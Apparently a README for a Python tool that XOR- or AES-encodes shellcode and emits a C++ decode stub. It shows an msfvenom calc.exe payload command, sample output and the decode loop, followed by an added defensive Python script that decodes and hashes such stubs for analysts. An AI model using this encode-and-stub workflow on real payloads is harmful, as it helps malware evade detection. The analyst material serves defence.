Creates a C++ stub with XOR/AES-encoded shellcode. Includes a decode stub. Also includes XOR/AES + Base64.

0xflagplz/encode_payload

## Installation

Python 2.7

```
git clone https://github.com/AchocolatechipPancake/encode_payload.git
sudo apt update
sudo apt install python-pip
pip2 install -r requirements
```

## Get encryption output for payload via key

Takes a binary payload file and encodes it with the provided key. The output includes C++ code to decode it.

(Python2) Execution Examples:

```
python encode.py shellcodefile key
python encode.py poc.raw 12345
python encode.py poc.bin sa89ydsa
```

## Output Example

```
msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o file.bin
python encode.py file.bin 123abc
```

[*] Shellcode file [file.bin] successfully loaded
[*] MD5 hash of the initial shellcode: [f0d4c2f27ad22bd89f443ad65711d49f]
[*] Original Shellcode size: [276] bytes


[*] Add the following to C++ code file

==================================== XOR C++ Code ====================================

[*] XOR encoding the shellcode with key [123abc]
char key[] = "123abc";
char cipherType[] = "xor";

[*] Encrypted XOR shellcode size: [276] bytes

==================================== AES C++ Code ====================================

[*] AES encrypting the shellcode with 128 bits derived key [a8EWkYTZn0qK/2xhh/mRTQ==]
char key[] = "a8EWkYTZn0qK/2xhh/mRTQ==";
char cipherType[] = "aes";

[*] Encrypted AES shellcode size: [304] bytes


================================= C++ Decrypt Code =================================

```cpp
int j = 0;
for (int i = 0; i < sizeof encryptedShellcode; i++) {
     if (j == sizeof key - 1) j = 0;
     shellcode[i] = encryptedShellcode[i] ^ key[j];
     j++;
}
```


============================= Base64 String =============================

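An added example for analysts (Python 3, not code from this repository): the generated stub carries `key` and `cipherType` in clear text beside the encoded bytes, so once these declarations are recovered from a sample the XOR variant can be decoded directly and hashed for comparison with known payloads. The function names and the `SAMPLE_STUB` bytes are constructed for illustration; the AES variant is only reported, because the page does not state its mode or key derivation.

```python
import hashlib
import re

# `char name[] = "...";` as printed in the tool output shown above.
DECL = re.compile(r'char\s+(\w+)\[\]\s*=\s*"((?:\\.|[^"\\])*)";')
HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2})+')

# Constructed sample: the ASCII text "BENIGN-TEST" XORed with key "123abc".
SAMPLE_STUB = r'''
char encryptedShellcode[] = "\x73\x77\x7d\x28\x25\x2d\x1c\x66\x76\x32\x36";
char key[] = "123abc";
char cipherType[] = "xor";
'''


def parse_stub(text):
    """Map each declared array name to its bytes."""
    fields = {}
    for name, literal in DECL.findall(text):
        if HEX_RUN.fullmatch(literal):
            # Payload literal: nothing but \xNN escapes.
            fields[name] = bytes.fromhex(literal.replace("\\x", ""))
        else:
            fields[name] = literal.encode("latin-1")
    return fields


def xor_decode(data, key):
    """Repeating-key XOR, the operation the printed decode loop performs."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def triage(text):
    """Decode an XOR stub; return cipher, size, MD5 and the decoded bytes."""
    fields = parse_stub(text)
    cipher = fields.get("cipherType", b"").decode("latin-1")
    if cipher != "xor" or "key" not in fields or "encryptedShellcode" not in fields:
        return {"cipher": cipher, "decoded": None}
    plain = xor_decode(fields["encryptedShellcode"], fields["key"])
    return {"cipher": cipher, "size": len(plain),
            "md5": hashlib.md5(plain).hexdigest(), "decoded": plain}


if __name__ == "__main__":
    print(triage(SAMPLE_STUB))
```

The decoded size equals the encoded size, matching the identical `[276]` byte counts in the XOR output above, and the MD5 of the decoded bytes can be checked against the hash the tool prints for the initial payload.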
